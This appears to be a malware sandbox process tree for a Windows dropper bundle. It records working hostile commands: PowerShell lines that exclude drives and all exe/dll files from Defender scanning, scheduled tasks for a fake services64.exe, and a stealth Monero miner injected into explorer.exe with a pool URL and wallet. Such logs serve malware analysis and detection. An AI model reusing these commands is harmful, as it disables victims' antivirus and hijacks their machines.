C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.sprite/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6D5Kw+SNPLfPB2ukC//O063ow4gpmyCIpKu2yHpDxuv7" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
5⤵
PID:5388

C:\Users\Admin\AppData\Local\Temp\inst1.exe
"C:\Users\Admin\AppData\Local\Temp\inst1.exe"
2⤵
- Executes dropped EXE
PID:2084

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
2⤵
- Executes dropped EXE
PID:4568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 796
3⤵
- Program crash
PID:3696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 804
3⤵
- Program crash
PID:1288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 832
3⤵
- Program crash
PID:2040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 836
3⤵
- Program crash
PID:5112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1036
3⤵
- Program crash
PID:1796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 968
3⤵
- Program crash
PID:5200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1080
3⤵
- Program crash
PID:3760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1248
3⤵
- Program crash
PID:5716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1292
3⤵
- Program crash
PID:720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1512
3⤵
- Program crash
PID:3896

C:\Users\Admin\AppData\Local\Temp\askinstall63.exe
"C:\Users\Admin\AppData\Local\Temp\askinstall63.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4332

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:1184

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4456

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3316

C:\Users\Admin\AppData\Local\Temp\aL8sr8AGdCh7H\Routes License Agreement.exe
"C:\Users\Admin\AppData\Local\Temp\aL8sr8AGdCh7H\Routes License Agreement.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4328

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2104

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",
3⤵
PID:2412

C:\Users\Admin\AppData\Local\Temp\anytime1.exe
"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5028

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:3064

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1624

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
4⤵
- Executes dropped EXE
PID:2304

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
5⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4732

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
6⤵
PID:964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:5848

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
6⤵
PID:4932

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
7⤵
- Creates scheduled task(s)
PID:5280

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
6⤵
- Executes dropped EXE
PID:5556

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.sprite/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6D5Kw+SNPLfPB2ukC//O063ow4gpmyCIpKu2yHpDxuv7" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
6⤵
PID:5024

C:\Users\Admin\AppData\Local\Temp\anytime2.exe
"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1104

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4068

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:208

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
4⤵
- Executes dropped EXE
PID:3028

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
5⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4212

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
6⤵
PID:3916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
7⤵
PID:5832

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
6⤵
PID:3304

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
7⤵
- Creates scheduled task(s)
PID:5288

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
6⤵
- Executes dropped EXE
PID:5340

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.sprite/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6D5Kw+SNPLfPB2ukC//O063ow4gpmyCIpKu2yHpDxuv7" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
6⤵
PID:5476

C:\Users\Admin\AppData\Local\Temp\anytime3.exe
"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1648

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:2424

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
4⤵
- Executes dropped EXE
PID:1372

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
5⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4668

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
6⤵
PID:5016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:5856

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
6⤵
PID:4872

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
7⤵
- Creates scheduled task(s)
PID:5364

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
6⤵
- Executes dropped EXE
PID:900

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.sprite/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6D5Kw+SNPLfPB2ukC//O063ow4gpmyCIpKu2yHpDxuv7" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
6⤵
PID:5240

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5032

C:\Users\Admin\AppData\Local\Temp\anytime4.exe
"C:\Users\Admin\AppData\Local\Temp\anytime4.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3456

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4064

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1428

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
4⤵
- Executes dropped EXE
PID:500

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3652

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
6⤵
PID:3772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:5864

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
6⤵
PID:504

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
7⤵
- Creates scheduled task(s)
PID:5312

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
6⤵
PID:3436

C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
7⤵
- Executes dropped EXE
PID:4304

C:\Users\Admin\AppData\Local\Temp\anytime5.exe
"C:\Users\Admin\AppData\Local\Temp\anytime5.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4216

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4564

C:\Users\Admin\AppData\Local\Temp\anytime6.exe
"C:\Users\Admin\AppData\Local\Temp\anytime6.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:4976

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:1064

C:\Users\Admin\AppData\Local\Temp\anytime7.exe
"C:\Users\Admin\AppData\Local\Temp\anytime7.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:732

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4924

C:\Users\Admin\AppData\Local\Temp\anytime8.exe
"C:\Users\Admin\AppData\Local\Temp\anytime8.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:4848

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:1032

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4440

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:1644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4568 -ip 4568
1⤵
PID:1964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1032 -ip 1032
1⤵
PID:4264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 1456
1⤵
- Program crash
PID:3472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4568 -ip 4568
1⤵
PID:4404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4568 -ip 4568
1⤵
PID:4860

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 580 -p 208 -ip 208
1⤵
PID:816

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1624 -s 1600
1⤵
- Program crash
PID:3924

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 208 -s 1600
1⤵
- Program crash
PID:2260

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",
1⤵
- Loads dropped DLL
PID:1044

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",
2⤵
PID:332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4568 -ip 4568
1⤵
PID:4040

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1428 -s 1600
1⤵
- Program crash
PID:2948

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 480 -p 1428 -ip 1428
1⤵
PID:5056

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 576 -p 5032 -ip 5032
1⤵
PID:3916

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 520 -p 1624 -ip 1624
1⤵
PID:936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3800 -ip 3800
1⤵
PID:4248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1468
1⤵
- Program crash
PID:4136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1064 -ip 1064
1⤵
PID:3432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4564 -ip 4564
1⤵
PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1644 -ip 1644
1⤵
PID:2520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4924 -ip 4924
1⤵
PID:1492

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Loads dropped DLL
PID:3800

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:3736

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
1⤵
- Executes dropped EXE
PID:2152

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
3⤵
PID:5032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
4⤵
PID:5880

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
3⤵
PID:1552

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
4⤵
- Creates scheduled task(s)
PID:5352

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
3⤵
PID:5188

C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
4⤵
- Executes dropped EXE
PID:5512

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
1⤵
- Executes dropped EXE
PID:3912

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4776

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
3⤵
PID:444

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
4⤵
- Creates scheduled task(s)
PID:5368

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
3⤵
PID:5680

C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
4⤵
- Executes dropped EXE
PID:5592

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
1⤵
- Executes dropped EXE
PID:4084

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4660

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
3⤵
PID:3108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5840

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
3⤵
PID:3536

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
4⤵
- Creates scheduled task(s)
PID:5320

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
3⤵
PID:5792

C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
4⤵
- Executes dropped EXE
PID:5812

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
1⤵
- Executes dropped EXE
PID:3436

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
3⤵
PID:3704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5872

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
3⤵
PID:1188

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
4⤵
- Creates scheduled task(s)
PID:5304

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
3⤵
PID:4760

C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
4⤵
- Executes dropped EXE
PID:5688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4568 -ip 4568
1⤵
PID:1064

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
1⤵
PID:3864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
